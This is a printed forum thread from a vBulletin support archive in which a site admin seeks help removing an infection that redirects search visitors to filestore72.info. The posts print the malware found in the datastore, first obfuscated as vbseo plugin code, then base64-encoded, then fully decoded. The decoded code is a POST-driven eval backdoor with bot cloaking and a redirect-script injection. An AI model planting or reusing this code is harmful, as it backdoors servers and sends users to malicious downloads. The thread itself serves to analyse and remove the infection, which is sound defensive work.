vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   vB 3.8 virus infection - How to remove filestore72.info (https://vborg.vbsupport.ru/showthread.php?t=319558)

Fynnon 07-19-2015 01:57 PM
vB 3.8 virus infection - How to remove filestore72.info
 
Hi, i got some people complaining that coming from google the forum redirects to filestore72.info


using


Code:
SELECT * FROM datastore WHERE data LIKE '%strtr%'
found something i can`t decipher so maybe someone in here could provide some assistance

PHP Code:
$vbulletin->templatecache['headinclude'].=fetch_template('activity_headinclude');



$pt 'b6d38f1684e2389d8aa938bc5fbee5c6';
$arrvb '30m%D2zm93h[,V3kRV3D>/e=>K%omJ=A+g}]*K%lEC+8zlX6m"=ogKJ[mgX6kB4jk7j<3Bq&E.VjmgX?zC)_gKJBkl=BkBk9T.jf>/eR>K&0+8=%k]>0k]T]#bL<*|8<+Or<k|X%V.4jg8~Nw8qz>/~6g7j<+g+rz.rO;gX%Xvq^+CJvzKq%E/X6k%=Bz|}&TB4jg8~Nw8qz>/~6g7j<En9jVn8Lk/>%+8=Q;gqvm.4]1K>0V/&AkC%j+g>x;|>rVK&xkK&8k]~x3")o+CJ[1Kj]#.q^w6J7JjJ7"BV1J)q}g8JnqJ>^}wV)n%}]g7jf>/T=}/~rk]X%g|JBz.4jg8X)w%+)w%9]7)qww)=7qw+)wjJ7>86<*Bq6NwLjk89]mC=AV.VV*BqBNw~?klJ]gK8rVCXRE.kvzC%K+J?o;K=Q^CV0zKV9+J?o^/%rmC=0g._x;l%o+B_vzK8x3")o+CJ[g._BVg&B;"8OzCJBg._BVg&O;"%jVJ?o^C+r;KJOzK=!g._xm"_AVC)]kl)Qg._xVC%o3gJBz)?o^C><V)?oz/jvm7k9>/}<^/?jVb6=>|}o;Kx]*BqRNwLjg8X)w%+)w%9]7)qww)=1n8Xw>86f>/L=}eXNn6Q>qJ=}wjJC7J4f>Ce=})q17JX^w6X77J~wNn6=>K8<kKT]*BqvN7q?#OV9;gX6Vl%Amg}]*BqoN7q?#OV9;"_]gK%j>A9j3n8Lz|>jEe+>neJ^JjJ7w6%NnOj:kr!D[|Z:Xnef>/R=+"8?V/jR>)=nqJ>"qJ>z>6rwJ)~^")=Xn8R]g7jf>CR=>A&A;|><k/}4V/%?+n6OVCJ[V.=I;g+rkKXBmg~61O~AklT=1Oko>/+OV"&9+gq<zO6:kr!D[|Z:z|~6m"=ok89];l>8kl?]g7[]#K8<kKTokCr?N|;=>B[jVl>8zC&%VC%o#n_0k/q<zK_A"BVAm"8?zCJK+g>Am"=o>86o>B+rzgLfm]T=m]TONv?0kKXBmg~6NOkfm";R+"8?V/jR>)=bn6=#7wJz>C_VE7%fm";R>Cel>l%AkKJ6E.q^q6Jw"BVK>86<>O;RmgXA+g}R>)=/qJqz>K<A>86<E7;lE.)%zg~6374jg6XNn6Q>qJ9j;86<E7%fm";R>/}=N7qREgQ<+O4j3O%A+gqvzK=!m"wR>C[9>KJo>B&6m"8%E.j!TA;?TbL<*BqQNgX8;]X6kOrQ+bwR>C4<#bL9*.jfk/><z]}R1lq0;|JQ+"_6#l&0;K)6m"=oN7VRV/q?*Ox0+l%9+gX6z|>%XA1om"_lzB=jz|VozC=r+._?m/L:kr!D[fZ:m"}=3BqQ^7kOEnQ=+gr<VbQ=m";RE.ejV7jl>OqBEgQ<+O4j37%f>eVTn6>~n)Xz>|q%zg~9;gq%gKr0zK9]gJ9]mCJr+C%o;K&8+CJ^ml)K;gXvkl%?V.VV#v6jmvQ=+"&A+g9jq6&N}j)Tw89]k|q_zCw]gJ9];|XA>86oN7qI*|8=^}ZZ`';
$ajx ':eMx(UPoYL}O`I5&@|=XQ^sp4~1Tt*./+2>9j"7AmgKv#rZy8!Vwd[kqicnS6NhzD-a$R;ulF3,BG{?JWfCEb%]H0)_<';
$ajx2 '.E[8/~?u#AQi;q-x|39Ntf&<gBIM,OCHZ@JskWSzaX2jLh)+1rdU`4cR:=T>0P6b($"%oY!m{e_y}]wV*7GKDln^vF5p';
$baseline '%s%'.substr($arrvb7331);
$gpu preg_replace($baselinestrtr($arrvb$ajx$ajx2), 'vbseo');
if($vbulletin->options['vbseostats']&&$vbulletin->options['vbseonavLink']){
  eval('$template_hook[navbar_buttons_left].="'.fetch_template('activity_navbar').'";');
}//endif($vbulletin->options['vbseonavLink'])


$vbulletin->templatecache['forumhome_lastpostby'] = $vbulletin->templatecache['colorsforusergroupinforumdisplay'] . $vbulletin->templatecache['forumhome_lastpostby']; 

Replicant 07-19-2015 05:00 PM
1 Attachment(s)
the strtr function in the $gpu line kicks out.

Code:
eval(@base64_decode(JHE9J2luaV9zZXQnO2lmKGZ1bmN0aW9uX2V4aXN0cygkcSkpeyRxKCdkaXNwbGF5X2Vycm9ycycsMCk7JHEoJ2xvZ19lcnJvcnMnLDApO31pZihpc3NldCgkX1BPU1RbJHB0XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHB0XSkpKTskdT1AcHJlZ19tYXRjaCgnI2JvdHxzcGlkZXJ8Y3Jhd2x8c2x1cnB8eWFuZGV4I2knLCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7JHM9QHBhcnNlX3VybCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pOyR0PUAkc1snaG9zdCddOyRyPUBwcmVnX21hdGNoKCcjbGl2ZVwuY29tfGdvb2dsZVwufHlhaG9vXC58YmluZy5jb218eWFuZGV4XC5ydXxyYW1ibGVyXC5ydXxiYWlkdVwufGZhY2Vib29rXC58aW5zdGFncmFtXC58dGlueXVybFwufGJpdFwubHkjaScsJHQpfHwkdD09J3QuY28nOyRoPUAkX1NFUlZFUlsnSFRUUF9IT1NUJ107JHA9QENPT0tJRV9QUkVGSVg7JGE9QFRISVNfU0NSSVBUPT09J21pc2MnOyRjPSRwLidsYXN0dmlzaXQnOyRuPSRwLidsYW5nX2lkJzskeT1Ab3JkKEZJTEVfVkVSU0lPTik.chr(43).NTE7JHo9ZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9NT1onXSk7JGo9JzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9IicuJHZidWxsZXRpbi0.chr(43).b3B0aW9uc1snYmJ1cmwnXS4nL21pc2MucGhwP3Y9Jy4kdmJ1bGxldGluLT5vcHRpb25zWydzaW1wbGV2ZXJzaW9uJ10uJyZhbXA7anM9anMiPjwvc2NyaXB0Pic7aWYoZW1wdHkoJF9DT09LSUVbJG5dKSl7aWYoJGEmJmlzc2V0KCRfR0VUWyd2J10pJiYoaXNzZXQoJF9HRVRbJ2pzJ10pKSYmKCFlbXB0eSgkX0NPT0tJRVskY10pKSl7aWYoJHQ9PSRoKXtpZigkeilzZXRjb29raWUoJG4sJ2VuJyx0aW1lKCkrMzYwMDApOyRtPXN1YnN0cihtZDUoJGgpLDAsOCk7cHJpbnQoImRvY3VtZW50LmxvY2F0aW9uPSdodHRwOi8vZmlsZXN0b3JlNzIuaW5mby9kb3dubG9hZC5waHA.chr(47).aWQ9eyRtfSciKTt9ZXhpdDt9aWYoKCEkdSkmJiRyKXtpZigkeSl7JEdMT0JBTFNbJ3RlbXBsYXRlX2hvb2snXVsnaGVhZGluY2x1ZGVfamF2YXNjcmlwdCddLj0kajt9ZWxzZXskR0xPQkFMU1snc3R5bGUnXVsnY3NzJ10uPSRqO319fQ));
The editor won't let me post the decoded result, so I'll put it in picture form.

Fynnon 07-19-2015 06:08 PM
Thanks. From your code using this online tool https://www.samltool.com/base64.php i got:

PHP Code:
$q='ini_set';if(function_exists($q)){$q('display_errors',0);

$q('log_errors',0);}if(isset($_POST[$pt]))eval(base 64_decode(str_rot13($_POST[$pt])));

$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);

$s=@parse_url($_SERVER['HTTP_REFERER']);$t=@$s['host'];$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly#i',$t)||$t=='t.co';

$h=@$_SERVER['HTTP_HOST'];$p=@COOKIE_PREFIX;$a=@THIS_SCRIPT==='misc';$c=$p.'lastvisit';$n=$p.'lang_id';

$y=@ord(FILE_VERSION)751;$z=empty($_SERVER['HTTP_X_MOZ']);$j='<script type="text/javascript" src="'.$vbulletin-7options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;js=js"></script>';if(empty($_COOKIE[$n])){if($a&&isset($_GET['v'])&&(isset($_GET['js']))&&(!empty($_COOKIE[$c]))){if($t==$h){if($z)setcookie($n,'en',time()+36000);

$m=substr(md5($h),0,8);print("document.location='http://filestore72.info/download.php;id={$m}'");}exit;}if((!$u)&&$r){if($y){$GLOBALS['template_hook']['headinclude_javascript'].=$j;}else{$GLOBALS['style']['css'].=$j;}}} 

EDIT: still getting redirects


All times are GMT. The time now is 11:32 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01705 seconds
  • Memory Usage 1,750KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_code_printable
  • (2)bbcode_php_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (3)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete